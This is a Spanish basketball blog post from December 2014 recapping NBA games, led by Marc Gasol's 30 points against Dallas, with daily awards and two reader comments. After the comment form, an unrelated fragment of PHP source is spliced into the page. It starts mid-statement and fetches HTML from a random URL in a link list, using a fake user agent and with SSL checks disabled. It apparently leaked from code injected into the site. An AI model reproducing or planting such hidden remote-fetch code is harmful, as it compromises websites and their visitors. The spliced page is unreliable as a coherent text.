La crónica: Gasol II, Rey de Memphis

10 de December de 2014 por FranGuaita

Partido descomunal de Marc, sólida alternativa al MVP si mantiene el nivel de esta madrugada. Cleveland supera a Toronto en la batalla de colosos del Este con 35 puntos de LeBron. En el salvaje Oeste, Utah sorprende a Spurs -expulsión de Popovich incluida- y Chris Bosh arrasa el US Airways Center. Además, han ganado los Lakers. Que no es poco.

Pasen y lean…

marc_mavs

CAVALIERS 105 – RAPTORS 101
Pese a su irregular comienzo de regular season, Cleveland ya ve de cerca el trono del Este. Lo dijo anoche LeBron tras el asalto de Brooklyn: “Hemos encontrado la fórmula para ganar partidos”. No le falta razón. Son ocho triunfos consecutivos, palabras mayores. En dos semanas, la franquicia ha convertido el inquietante 5-7 de inicio en un 13-7 que les aproxima al triunvirato de líderes de conferencia formado por Toronto, Atlanta y Washington. El guión de anoche en el regreso a Ohio, eso sí, no fue tan sofisticado como en otras ocasiones. Fórmula LeBron. Balones al 23. Fundamentalmente en el último cuarto. Con su equipo 85-95 bajo, James apareció al rescate con 10 de sus 35 puntos para liderar la remontada de los Cavaliers. ‘The Chosen one’ puso al Quicken Loans Arena en pie con un triple frontal que sirvió de sentencia definitiva a falta de 48 segundos. No habrá que esperar mucho tiempo para comprobar si la fiabilidad de Cleveland es definitiva: jueves y viernes back to back en Oklahoma y New Orleans.

GRIZZLIES 114 – MAVERICKS 105
Dave Joerger, coach de los Grizzlies, aseguró antes del partido ante Dallas que iba a encargarse personalmente de devolver a Marc Gasol el protagonismo perdido. Fue surrealista comprobar cómo el center español se quedaba en dos puntos (únicamente dispuso de seis tiros de campo) el domingo de madrugada en la victoria ante Miami Heat. El mediano de los Gasol pareció entender el mensaje. Y el resto de sus compañeros, también. Marc anotó 14 puntos en el primer cuarto, periodo en el que, además, fue siete veces a la línea de tiros libres. Todo el juego en estático de Memphis durante este parcial descansó sobre sus hombros. Dallas no lo puso sencillo. En absoluto. El equipo dirigido por Rick Carlisle enchufó 18 triples -6 de ellos a cargo de Parsons (30 puntos)- y peleó hasta los instantes finales. En la hora de los valientes, Memphis dispuso de la manita prodigiosa de Beno Udrih y, como no, de su indiscutible jugador franquicia. Con 108-102 en el electrónico y los Mavericks trepando hacia el cogote del oso, Marc Gasol capturó un rebote ofensivo tras error en la suspensión de Z-Bo, se quitó de encima a Nowitzki y acertó con el tiro de gracia. En el reino de Marc nunca se pone el sol.

JAZZ 100 – SPURS 96
Ni forzando su expulsión en la recta final del tercer cuarto consiguió Gregg Popovich activar la defensa de San Antonio, que concedió en Salt Lake City una humillante derrota. Cuando llegue mayo y el objetivo sea pelear por el mejor registro de conferencia, alguno puede acordarse de este gatillazo en el EnergySolutions Arena. No está el salvaje Oeste para regalos y los Spurs se disfrazaron anoche de Santa Claus. Utah, que venía de perder nueve partidos seguidos con un pírrico balance de 5-16, anotó el 50% de sus tiros de campo. MVP para Derrick Favors (21 puntos, 8 rebotes) y mención honorífica para Gordon Hayward (20 puntos, 7 rebotes) y Enes Kanter (12 puntos, 15 rebotes). La ausencia de Tony Parker en San Antonio, decisiva. En momentos clutch, el equipo no tuvo en esta ocasión el coco necesario para buscar el pase extra, la mejor opción de tiro librado. Circunstancia que con jugadores como el francés o incluso Patty Mills en pista suele ser completamente inversa. Eso sí, el cabreo a Coach Pop ya no se lo quita nadie.

SUNS 97 – HEAT 103
Tras una racha de derrotas ante Washington, Milwaukee, Atlanta y Memphis -alguna de ellas razonablemente embarazosas- Chris Bosh dijo basta anoche en el US Airways Center. 34 puntos y 9 rebotes del pivot forjado en la Universidad de Georgia Tech. Un recital absoluto que no encontró reacción en la defensa interior de Phoenix. El cinco inicial de Miami (Cole-Wade-Deng-McBob-Bosh) alcanzó las dobles figuras. Poco a nada que ver, por ejemplo, con la aciaga noche de Eric Bledsoe (2/11 en tiros de campo). Ante esta crisis ofensiva, los Suns acudieron a su segunda unidad. Marcus Morris y Gerald Green se combinaron para 44 puntos desde el banquillo. Fueron estériles. Bosh sigue empeñado en demostrar que hay vida después de LeBron.

PELICANS 104 – KNICKS 93
Si Phil Jackson trataba de sacudir las conciencias de sus jugadores con las declaraciones respecto a la mentalidad perdedora de los Knicks, la estrategia no ha surtido efecto. Al menos de momento. Novena derrota consecutiva de NY, en esta ocasión en el Smoothie King Center de New Orleans. Y eso que Anthony Davis no jugó al nivel excelso de otras noches. Tyreke Evans fue el brazo ejecutor de los Pelicans con 27 puntos y una impresionante serie de 11/15 en tiros de campo. La autoridad en la pintura llegó desde Turquía: doble doble de Omer Asik (16 puntos, 14 rebotes). Es muy posible que la tormenta siga azotando La Gran Manzana. Spurs, Raptors, Mavs, Suns y Bulls serán cinco de los siguientes seis rivales de New York.

THUNDER 114 – BUCKS 101
Ahora que se acerca la Navidad, no hay nada como regresar a casa. Y si no, que le pregunten a Kevin Durant. Primer partido de la regular season en el Chesapeake Energy Arena, victoria y grandes números de KD, viviendo en la frontera del triple doble: 23 puntos, 9 rebotes y 7 asistencias. Todo vuelve a ser normal en Oklahoma, que no tardará en sobrepasar la barrera del 50% de W. Hablando de W, Russell Westbrook enchufó 28 puntos y repartió felicidad en forma de 7 asistencias. Hogar, dulce hogar.

PISTONS 86 – BLAZERS 98
Con un excelente trabajo defensivo en el tercer cuarto -limitando a Detroit hasta una serie de 4/18 en tiros de campo- Portland se impuso en el Palace de Auburn Hills. LaMarcus Aldridge firmó una hoja de servicios con 23 puntos, 11 rebotes y dos canastas consecutivas fundamentales cuando, en el último periodo, los Pistons rebajaron la diferencia hasta el 77-81. Trece derrotas consecutivas de Detroit, a tan solo una del récord negativo de la franquicia en 1980 y 1994. Malos tiempos para la Motown.

LAKERS 98 – KINGS 95
Si incluso Javier Cámara conseguía encontrar al amor de su vida en ‘Que se mueran los feos’, ¿por qué no iban los Lakers a ganar alguna vez?. Estos Lakers son un poco como Eliseo, el personaje central de la película española de 2010. Eliseo era feo, cojo y bastante desgraciado. Pero a base de perseverancia -con 41 tacos- consiguió ligar. Es cierto que Carmen Machi no es Eva Mendes pero menos da una piedra. Algo así ocurre con la franquicia californiana. No va a ganar el anillo, pero tampoco podemos negarle el pan y la sal. Esta madrugada, los Lakers se han dejado el alma para remontar un partido que tenían perdido durante el tercer cuarto. El estallido anotador de Kobe (32 puntos, 6 asistencias, 8/8 en tiros libres) y, sobre todo, el esfuerzo defensivo -sí, es noticia, los Lakers han defendido- en las últimas posesiones de Sacramento han devuelto el confeti púrpura y dorado a las entrañas del Staples. Una vez al año…

bron_rapt

PREMIOS

MVP: Presentaron su candidatura al máximo galardón de la jornada Chris Bosh (34 puntos con 14 de 21 en tiros, 9 rebotes y 4 robos), Westbrook (28 puntos, 5 rebotes, 7 asistencias y 3 robos), Tyreke Evans (27-4-6), Kobe (32-3-6-2) y LeBron (35-2-4-2-2) pero nosotros rendimos pleitesía al Rey Marc, que impuso su voluntad frente a los Mavs con 30 puntos, 5 rebotes y 6 asistencias.

Rookie: A elegir entre la actuación completa de Ennis (4 puntos, 3 rebotes, 2 asistencias, 2 robos y 1 tapón) o anotadora de Jabari Parker (15 puntos).

Sorpresa: Hornacek lo ha mandado al banquillo tras iniciar la campaña como titular, pero Marcus Morris se destapó anoche con 25 puntos (10 de 13 FG), 5 rebotes, 4 asistencias y 2 robos.

Decepción: Compañeros en los Bucks no hace tanto, Monta Ellis y Brandon Jennings se reúnen como dos de los peores de la pasada madrugada. Ellis pagó las molestias en el codo con un 1 de 11 en tiros para 2 puntos y 3 pérdidas de balón, mientras que la aportación de Brandon Jennings se limitó a 1 punto con 0 de 5 en tiros.

Mayor esfuerzo en vano: Dos veteranísimos como Tim Duncan (23 puntos, 14 rebotes, 4 tapones, 3 robos y 2 asistencias) y Amaré Stoudemire (26 puntos, 5 rebotes, 5 tapones) comparten honores con uno de los jóvenes valores de la liga, Chandler Parsons (30 puntos, 7 rebotes, 3 asistencias, 2 robos y 1 tapón).

Top 10

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Que penita que le falte un poco de IQ a Westbrook que si no vaya jugadorazo,ni LeBron ni Durant,él sería el rey.Una auténtica “Force of nature” y a día de hoy el jugador franquicia de Oklahoma,mientras Durant va cogiendo tono.Bonita paliza en el rebote de los Thunder,54 contra 31,incluidos 15 ofensivos (7 de Perkins,que ahí hizo pupa),que fueron la cruz para los de Kidd,que eso sí,sólo se vieron derrotados en el último cuarto.Sanders y Pachulia se combinaron para 3 rebotes.Con eso se dice todo.

    Lo de Kobe es envidiable desde luego,dejando lo de su contrato aparte,pero ojo que a finales de temporada los Lakers se acuerden de estos buenos resultados con su ronda protegida TOP 5 (Phoenix).Por otra parte,rumores de traspasos en los Nets: Deron,JoJo y Brook en el disparadero.

      Citar

  2. sabas dice:
    #2

    Si los net logran engañar a alguien, seria igual que el timo de la estampita.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>